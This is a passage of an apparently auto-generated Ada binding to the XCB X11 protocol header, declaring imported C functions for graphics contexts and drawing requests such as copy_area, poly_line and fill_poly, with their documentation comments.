bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_create_gc_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9254 with Import => True, Convention => C, External_Name => "xcb_create_gc_aux_checked"; --* -- * @brief Creates a graphics context -- * -- * @param c The connection -- * @param cid The ID with which you will refer to the graphics context, created by -- * `xcb_generate_id`. -- * @param drawable Drawable to get the root/depth from. -- * @return A cookie -- * -- * Creates a graphics context. The graphics context can be used with any drawable -- * that has the same root and depth as the specified drawable. -- * -- function xcb_create_gc_aux (c : access xcb.xcb_connection_t; cid : xcb_gcontext_t; drawable : xcb_drawable_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_create_gc_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9274 with Import => True, Convention => C, External_Name => "xcb_create_gc_aux"; function xcb_create_gc_value_list (R : access constant xcb_create_gc_request_t) return System.Address -- /usr/include/xcb/xproto.h:9281 with Import => True, Convention => C, External_Name => "xcb_create_gc_value_list"; function xcb_change_gc_value_list_serialize (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access constant xcb_change_gc_value_list_t) return int -- /usr/include/xcb/xproto.h:9284 with Import => True, Convention => C, External_Name => "xcb_change_gc_value_list_serialize"; function xcb_change_gc_value_list_unpack (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t; u_aux : access xcb_change_gc_value_list_t) return int -- /usr/include/xcb/xproto.h:9289 with Import => True, Convention => C, External_Name => "xcb_change_gc_value_list_unpack"; function xcb_change_gc_value_list_sizeof (u_buffer : System.Address; value_mask : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9294 with Import => True, Convention => C, External_Name => "xcb_change_gc_value_list_sizeof"; function xcb_change_gc_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:9298 with Import => True, Convention => C, External_Name => "xcb_change_gc_sizeof"; --* -- * @brief change graphics context components -- * -- * @param c The connection -- * @param gc The graphics context to change. -- * @param value_mask A bitmask of #xcb_gc_t values. -- * @param value_mask \n -- * @param value_list Values for each of the components specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the components specified by \a value_mask for the specified graphics context. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_gc_checked (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9319 with Import => True, Convention => C, External_Name => "xcb_change_gc_checked"; --* -- * @brief change graphics context components -- * -- * @param c The connection -- * @param gc The graphics context to change. -- * @param value_mask A bitmask of #xcb_gc_t values. -- * @param value_mask \n -- * @param value_list Values for each of the components specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the components specified by \a value_mask for the specified graphics context. -- * -- function xcb_change_gc (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : System.Address) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9340 with Import => True, Convention => C, External_Name => "xcb_change_gc"; --* -- * @brief change graphics context components -- * -- * @param c The connection -- * @param gc The graphics context to change. -- * @param value_mask A bitmask of #xcb_gc_t values. -- * @param value_mask \n -- * @param value_list Values for each of the components specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the components specified by \a value_mask for the specified graphics context. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_change_gc_aux_checked (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_gc_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9364 with Import => True, Convention => C, External_Name => "xcb_change_gc_aux_checked"; --* -- * @brief change graphics context components -- * -- * @param c The connection -- * @param gc The graphics context to change. -- * @param value_mask A bitmask of #xcb_gc_t values. -- * @param value_mask \n -- * @param value_list Values for each of the components specified in the bitmask \a value_mask. The -- * order has to correspond to the order of possible \a value_mask bits. See the -- * example. -- * @return A cookie -- * -- * Changes the components specified by \a value_mask for the specified graphics context. -- * -- function xcb_change_gc_aux (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t; value_list : access constant xcb_change_gc_value_list_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9385 with Import => True, Convention => C, External_Name => "xcb_change_gc_aux"; function xcb_change_gc_value_list (R : access constant xcb_change_gc_request_t) return System.Address -- /usr/include/xcb/xproto.h:9391 with Import => True, Convention => C, External_Name => "xcb_change_gc_value_list"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_copy_gc_checked (c : access xcb.xcb_connection_t; src_gc : xcb_gcontext_t; dst_gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9405 with Import => True, Convention => C, External_Name => "xcb_copy_gc_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_copy_gc (c : access xcb.xcb_connection_t; src_gc : xcb_gcontext_t; dst_gc : xcb_gcontext_t; value_mask : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9419 with Import => True, Convention => C, External_Name => "xcb_copy_gc"; function xcb_set_dashes_sizeof (u_buffer : System.Address) return int -- /usr/include/xcb/xproto.h:9425 with Import => True, Convention => C, External_Name => "xcb_set_dashes_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_dashes_checked (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; dash_offset : bits_stdint_uintn_h.uint16_t; dashes_len : bits_stdint_uintn_h.uint16_t; dashes : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9439 with Import => True, Convention => C, External_Name => "xcb_set_dashes_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_dashes (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t; dash_offset : bits_stdint_uintn_h.uint16_t; dashes_len : bits_stdint_uintn_h.uint16_t; dashes : access bits_stdint_uintn_h.uint8_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9454 with Import => True, Convention => C, External_Name => "xcb_set_dashes"; function xcb_set_dashes_dashes (R : access constant xcb_set_dashes_request_t) return access bits_stdint_uintn_h.uint8_t -- /usr/include/xcb/xproto.h:9461 with Import => True, Convention => C, External_Name => "xcb_set_dashes_dashes"; function xcb_set_dashes_dashes_length (R : access constant xcb_set_dashes_request_t) return int -- /usr/include/xcb/xproto.h:9464 with Import => True, Convention => C, External_Name => "xcb_set_dashes_dashes_length"; function xcb_set_dashes_dashes_end (R : access constant xcb_set_dashes_request_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:9467 with Import => True, Convention => C, External_Name => "xcb_set_dashes_dashes_end"; function xcb_set_clip_rectangles_sizeof (u_buffer : System.Address; rectangles_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9470 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_set_clip_rectangles_checked (c : access xcb.xcb_connection_t; ordering : bits_stdint_uintn_h.uint8_t; gc : xcb_gcontext_t; clip_x_origin : bits_stdint_intn_h.int16_t; clip_y_origin : bits_stdint_intn_h.int16_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9485 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_set_clip_rectangles (c : access xcb.xcb_connection_t; ordering : bits_stdint_uintn_h.uint8_t; gc : xcb_gcontext_t; clip_x_origin : bits_stdint_intn_h.int16_t; clip_y_origin : bits_stdint_intn_h.int16_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9502 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles"; function xcb_set_clip_rectangles_rectangles (R : access constant xcb_set_clip_rectangles_request_t) return access xcb_rectangle_t -- /usr/include/xcb/xproto.h:9511 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles_rectangles"; function xcb_set_clip_rectangles_rectangles_length (R : access constant xcb_set_clip_rectangles_request_t) return int -- /usr/include/xcb/xproto.h:9514 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles_rectangles_length"; function xcb_set_clip_rectangles_rectangles_iterator (R : access constant xcb_set_clip_rectangles_request_t) return xcb_rectangle_iterator_t -- /usr/include/xcb/xproto.h:9517 with Import => True, Convention => C, External_Name => "xcb_set_clip_rectangles_rectangles_iterator"; --* -- * @brief Destroys a graphics context -- * -- * @param c The connection -- * @param gc The graphics context to destroy. -- * @return A cookie -- * -- * Destroys the specified \a gc and all associated storage. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_free_gc_checked (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9533 with Import => True, Convention => C, External_Name => "xcb_free_gc_checked"; --* -- * @brief Destroys a graphics context -- * -- * @param c The connection -- * @param gc The graphics context to destroy. -- * @return A cookie -- * -- * Destroys the specified \a gc and all associated storage. -- * -- function xcb_free_gc (c : access xcb.xcb_connection_t; gc : xcb_gcontext_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9547 with Import => True, Convention => C, External_Name => "xcb_free_gc"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_clear_area_checked (c : access xcb.xcb_connection_t; exposures : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9562 with Import => True, Convention => C, External_Name => "xcb_clear_area_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_clear_area (c : access xcb.xcb_connection_t; exposures : bits_stdint_uintn_h.uint8_t; window : xcb_window_t; x : bits_stdint_intn_h.int16_t; y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9579 with Import => True, Convention => C, External_Name => "xcb_clear_area"; --* -- * @brief copy areas -- * -- * @param c The connection -- * @param src_drawable The source drawable (Window or Pixmap). -- * @param dst_drawable The destination drawable (Window or Pixmap). -- * @param gc The graphics context to use. -- * @param src_x The source X coordinate. -- * @param src_y The source Y coordinate. -- * @param dst_x The destination X coordinate. -- * @param dst_y The destination Y coordinate. -- * @param width The width of the area to copy (in pixels). -- * @param height The height of the area to copy (in pixels). -- * @return A cookie -- * -- * Copies the specified rectangle from \a src_drawable to \a dst_drawable. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_copy_area_checked (c : access xcb.xcb_connection_t; src_drawable : xcb_drawable_t; dst_drawable : xcb_drawable_t; gc : xcb_gcontext_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9609 with Import => True, Convention => C, External_Name => "xcb_copy_area_checked"; --* -- * @brief copy areas -- * -- * @param c The connection -- * @param src_drawable The source drawable (Window or Pixmap). -- * @param dst_drawable The destination drawable (Window or Pixmap). -- * @param gc The graphics context to use. -- * @param src_x The source X coordinate. -- * @param src_y The source Y coordinate. -- * @param dst_x The destination X coordinate. -- * @param dst_y The destination Y coordinate. -- * @param width The width of the area to copy (in pixels). -- * @param height The height of the area to copy (in pixels). -- * @return A cookie -- * -- * Copies the specified rectangle from \a src_drawable to \a dst_drawable. -- * -- function xcb_copy_area (c : access xcb.xcb_connection_t; src_drawable : xcb_drawable_t; dst_drawable : xcb_drawable_t; gc : xcb_gcontext_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9639 with Import => True, Convention => C, External_Name => "xcb_copy_area"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_copy_plane_checked (c : access xcb.xcb_connection_t; src_drawable : xcb_drawable_t; dst_drawable : xcb_drawable_t; gc : xcb_gcontext_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; bit_plane : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9662 with Import => True, Convention => C, External_Name => "xcb_copy_plane_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_copy_plane (c : access xcb.xcb_connection_t; src_drawable : xcb_drawable_t; dst_drawable : xcb_drawable_t; gc : xcb_gcontext_t; src_x : bits_stdint_intn_h.int16_t; src_y : bits_stdint_intn_h.int16_t; dst_x : bits_stdint_intn_h.int16_t; dst_y : bits_stdint_intn_h.int16_t; width : bits_stdint_uintn_h.uint16_t; height : bits_stdint_uintn_h.uint16_t; bit_plane : bits_stdint_uintn_h.uint32_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9683 with Import => True, Convention => C, External_Name => "xcb_copy_plane"; function xcb_poly_point_sizeof (u_buffer : System.Address; points_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9696 with Import => True, Convention => C, External_Name => "xcb_poly_point_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_point_checked (c : access xcb.xcb_connection_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9711 with Import => True, Convention => C, External_Name => "xcb_poly_point_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_point (c : access xcb.xcb_connection_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9727 with Import => True, Convention => C, External_Name => "xcb_poly_point"; function xcb_poly_point_points (R : access constant xcb_poly_point_request_t) return access xcb_point_t -- /usr/include/xcb/xproto.h:9735 with Import => True, Convention => C, External_Name => "xcb_poly_point_points"; function xcb_poly_point_points_length (R : access constant xcb_poly_point_request_t) return int -- /usr/include/xcb/xproto.h:9738 with Import => True, Convention => C, External_Name => "xcb_poly_point_points_length"; function xcb_poly_point_points_iterator (R : access constant xcb_poly_point_request_t) return xcb_point_iterator_t -- /usr/include/xcb/xproto.h:9741 with Import => True, Convention => C, External_Name => "xcb_poly_point_points_iterator"; function xcb_poly_line_sizeof (u_buffer : System.Address; points_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9744 with Import => True, Convention => C, External_Name => "xcb_poly_line_sizeof"; --* -- * @brief draw lines -- * -- * @param c The connection -- * @param coordinate_mode A bitmask of #xcb_coord_mode_t values. -- * @param coordinate_mode \n -- * @param drawable The drawable to draw the line(s) on. -- * @param gc The graphics context to use. -- * @param points_len The number of `xcb_point_t` structures in \a points. -- * @param points An array of points. -- * @return A cookie -- * -- * Draws \a points_len-1 lines between each pair of points (point[i], point[i+1]) -- * in the \a points array. The lines are drawn in the order listed in the array. -- * They join correctly at all intermediate points, and if the first and last -- * points coincide, the first and last lines also join correctly. For any given -- * line, a pixel is not drawn more than once. If thin (zero line-width) lines -- * intersect, the intersecting pixels are drawn multiple times. If wide lines -- * intersect, the intersecting pixels are drawn only once, as though the entire -- * request were a single, filled shape. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_line_checked (c : access xcb.xcb_connection_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9773 with Import => True, Convention => C, External_Name => "xcb_poly_line_checked"; --* -- * @brief draw lines -- * -- * @param c The connection -- * @param coordinate_mode A bitmask of #xcb_coord_mode_t values. -- * @param coordinate_mode \n -- * @param drawable The drawable to draw the line(s) on. -- * @param gc The graphics context to use. -- * @param points_len The number of `xcb_point_t` structures in \a points. -- * @param points An array of points. -- * @return A cookie -- * -- * Draws \a points_len-1 lines between each pair of points (point[i], point[i+1]) -- * in the \a points array. The lines are drawn in the order listed in the array. -- * They join correctly at all intermediate points, and if the first and last -- * points coincide, the first and last lines also join correctly. For any given -- * line, a pixel is not drawn more than once. If thin (zero line-width) lines -- * intersect, the intersecting pixels are drawn multiple times. If wide lines -- * intersect, the intersecting pixels are drawn only once, as though the entire -- * request were a single, filled shape. -- * -- function xcb_poly_line (c : access xcb.xcb_connection_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9803 with Import => True, Convention => C, External_Name => "xcb_poly_line"; function xcb_poly_line_points (R : access constant xcb_poly_line_request_t) return access xcb_point_t -- /usr/include/xcb/xproto.h:9811 with Import => True, Convention => C, External_Name => "xcb_poly_line_points"; function xcb_poly_line_points_length (R : access constant xcb_poly_line_request_t) return int -- /usr/include/xcb/xproto.h:9814 with Import => True, Convention => C, External_Name => "xcb_poly_line_points_length"; function xcb_poly_line_points_iterator (R : access constant xcb_poly_line_request_t) return xcb_point_iterator_t -- /usr/include/xcb/xproto.h:9817 with Import => True, Convention => C, External_Name => "xcb_poly_line_points_iterator"; --* -- * Get the next element of the iterator -- * @param i Pointer to a xcb_segment_iterator_t -- * -- * Get the next element in the iterator. The member rem is -- * decreased by one. The member data points to the next -- * element. The member index is increased by sizeof(xcb_segment_t) -- procedure xcb_segment_next (i : access xcb_segment_iterator_t) -- /usr/include/xcb/xproto.h:9828 with Import => True, Convention => C, External_Name => "xcb_segment_next"; --* -- * Return the iterator pointing to the last element -- * @param i An xcb_segment_iterator_t -- * @return The iterator pointing to the last element -- * -- * Set the current element in the iterator to the last element. -- * The member rem is set to 0. The member data points to the -- * last element. -- function xcb_segment_end (i : xcb_segment_iterator_t) return xcb.xcb_generic_iterator_t -- /usr/include/xcb/xproto.h:9840 with Import => True, Convention => C, External_Name => "xcb_segment_end"; function xcb_poly_segment_sizeof (u_buffer : System.Address; segments_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9843 with Import => True, Convention => C, External_Name => "xcb_poly_segment_sizeof"; --* -- * @brief draw lines -- * -- * @param c The connection -- * @param drawable A drawable (Window or Pixmap) to draw on. -- * @param gc The graphics context to use. -- * \n -- * TODO: document which attributes of a gc are used -- * @param segments_len The number of `xcb_segment_t` structures in \a segments. -- * @param segments An array of `xcb_segment_t` structures. -- * @return A cookie -- * -- * Draws multiple, unconnected lines. For each segment, a line is drawn between -- * (x1, y1) and (x2, y2). The lines are drawn in the order listed in the array of -- * `xcb_segment_t` structures and does not perform joining at coincident -- * endpoints. For any given line, a pixel is not drawn more than once. If lines -- * intersect, the intersecting pixels are drawn multiple times. -- * -- * TODO: include the xcb_segment_t data structure -- * -- * TODO: an example -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_segment_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; segments_len : bits_stdint_uintn_h.uint32_t; segments : access constant xcb_segment_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9873 with Import => True, Convention => C, External_Name => "xcb_poly_segment_checked"; --* -- * @brief draw lines -- * -- * @param c The connection -- * @param drawable A drawable (Window or Pixmap) to draw on. -- * @param gc The graphics context to use. -- * \n -- * TODO: document which attributes of a gc are used -- * @param segments_len The number of `xcb_segment_t` structures in \a segments. -- * @param segments An array of `xcb_segment_t` structures. -- * @return A cookie -- * -- * Draws multiple, unconnected lines. For each segment, a line is drawn between -- * (x1, y1) and (x2, y2). The lines are drawn in the order listed in the array of -- * `xcb_segment_t` structures and does not perform joining at coincident -- * endpoints. For any given line, a pixel is not drawn more than once. If lines -- * intersect, the intersecting pixels are drawn multiple times. -- * -- * TODO: include the xcb_segment_t data structure -- * -- * TODO: an example -- * -- function xcb_poly_segment (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; segments_len : bits_stdint_uintn_h.uint32_t; segments : access constant xcb_segment_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9903 with Import => True, Convention => C, External_Name => "xcb_poly_segment"; function xcb_poly_segment_segments (R : access constant xcb_poly_segment_request_t) return access xcb_segment_t -- /usr/include/xcb/xproto.h:9910 with Import => True, Convention => C, External_Name => "xcb_poly_segment_segments"; function xcb_poly_segment_segments_length (R : access constant xcb_poly_segment_request_t) return int -- /usr/include/xcb/xproto.h:9913 with Import => True, Convention => C, External_Name => "xcb_poly_segment_segments_length"; function xcb_poly_segment_segments_iterator (R : access constant xcb_poly_segment_request_t) return xcb_segment_iterator_t -- /usr/include/xcb/xproto.h:9916 with Import => True, Convention => C, External_Name => "xcb_poly_segment_segments_iterator"; function xcb_poly_rectangle_sizeof (u_buffer : System.Address; rectangles_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9919 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_rectangle_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9934 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_rectangle (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; rectangles_len : bits_stdint_uintn_h.uint32_t; rectangles : access constant xcb_rectangle_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9949 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle"; function xcb_poly_rectangle_rectangles (R : access constant xcb_poly_rectangle_request_t) return access xcb_rectangle_t -- /usr/include/xcb/xproto.h:9956 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle_rectangles"; function xcb_poly_rectangle_rectangles_length (R : access constant xcb_poly_rectangle_request_t) return int -- /usr/include/xcb/xproto.h:9959 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle_rectangles_length"; function xcb_poly_rectangle_rectangles_iterator (R : access constant xcb_poly_rectangle_request_t) return xcb_rectangle_iterator_t -- /usr/include/xcb/xproto.h:9962 with Import => True, Convention => C, External_Name => "xcb_poly_rectangle_rectangles_iterator"; function xcb_poly_arc_sizeof (u_buffer : System.Address; arcs_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:9965 with Import => True, Convention => C, External_Name => "xcb_poly_arc_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_poly_arc_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; arcs_len : bits_stdint_uintn_h.uint32_t; arcs : access constant xcb_arc_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9980 with Import => True, Convention => C, External_Name => "xcb_poly_arc_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_poly_arc (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; arcs_len : bits_stdint_uintn_h.uint32_t; arcs : access constant xcb_arc_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:9995 with Import => True, Convention => C, External_Name => "xcb_poly_arc"; function xcb_poly_arc_arcs (R : access constant xcb_poly_arc_request_t) return access xcb_arc_t -- /usr/include/xcb/xproto.h:10002 with Import => True, Convention => C, External_Name => "xcb_poly_arc_arcs"; function xcb_poly_arc_arcs_length (R : access constant xcb_poly_arc_request_t) return int -- /usr/include/xcb/xproto.h:10005 with Import => True, Convention => C, External_Name => "xcb_poly_arc_arcs_length"; function xcb_poly_arc_arcs_iterator (R : access constant xcb_poly_arc_request_t) return xcb_arc_iterator_t -- /usr/include/xcb/xproto.h:10008 with Import => True, Convention => C, External_Name => "xcb_poly_arc_arcs_iterator"; function xcb_fill_poly_sizeof (u_buffer : System.Address; points_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10011 with Import => True, Convention => C, External_Name => "xcb_fill_poly_sizeof"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- * This form can be used only if the request will not cause -- * a reply to be generated. Any returned error will be -- * saved for handling by xcb_request_check(). -- function xcb_fill_poly_checked (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; shape : bits_stdint_uintn_h.uint8_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10026 with Import => True, Convention => C, External_Name => "xcb_fill_poly_checked"; --* -- * -- * @param c The connection -- * @return A cookie -- * -- * Delivers a request to the X server. -- * -- function xcb_fill_poly (c : access xcb.xcb_connection_t; drawable : xcb_drawable_t; gc : xcb_gcontext_t; shape : bits_stdint_uintn_h.uint8_t; coordinate_mode : bits_stdint_uintn_h.uint8_t; points_len : bits_stdint_uintn_h.uint32_t; points : access constant xcb_point_t) return xcb.xcb_void_cookie_t -- /usr/include/xcb/xproto.h:10043 with Import => True, Convention => C, External_Name => "xcb_fill_poly"; function xcb_fill_poly_points (R : access constant xcb_fill_poly_request_t) return access xcb_point_t -- /usr/include/xcb/xproto.h:10052 with Import => True, Convention => C, External_Name => "xcb_fill_poly_points"; function xcb_fill_poly_points_length (R : access constant xcb_fill_poly_request_t) return int -- /usr/include/xcb/xproto.h:10055 with Import => True, Convention => C, External_Name => "xcb_fill_poly_points_length"; function xcb_fill_poly_points_iterator (R : access constant xcb_fill_poly_request_t) return xcb_point_iterator_t -- /usr/include/xcb/xproto.h:10058 with Import => True, Convention => C, External_Name => "xcb_fill_poly_points_iterator"; function xcb_poly_fill_rectangle_sizeof (u_buffer : System.Address; rectangles_len : bits_stdint_uintn_h.uint32_t) return int -- /usr/include/xcb/xproto.h:10061 with Import => True, Convention => C, External_Name => "xcb_poly_fill_rectangle_sizeof"; --* -- * @brief Fills rectangles -- * -- * @param c The connection -- * @param drawable The drawable (Window or Pixmap) to draw on. -- * @param gc The graphics context to use. -- * \n -- * The following graphics context components are used: function, 